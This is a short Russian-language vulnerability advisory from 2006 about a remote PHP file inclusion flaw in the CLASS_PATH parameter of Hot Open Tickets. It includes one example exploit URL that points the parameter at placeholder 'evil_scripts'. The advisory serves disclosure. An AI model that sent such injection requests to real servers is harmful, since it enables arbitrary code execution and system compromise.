PHP-инклюдинг в Hot Open Tickets

Дата публикации:
03.06.2006
Всего просмотров:
2383
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
HOT (Hot Open Tickets)
Уязвимые версии: HOT (Hot Open Tickets) 11012004_ver2f, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "CLASS_PATH" в различных сценариях. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://victim/[hot_path]/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=[evil_scripts]

URL производителя: hotopentickets.sourceforge.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: HOT [(Hot Open Tickets) (hot_11012004_ver2f)] - Remote File Include Vulnerabilities

или введите имя

CAPTCHA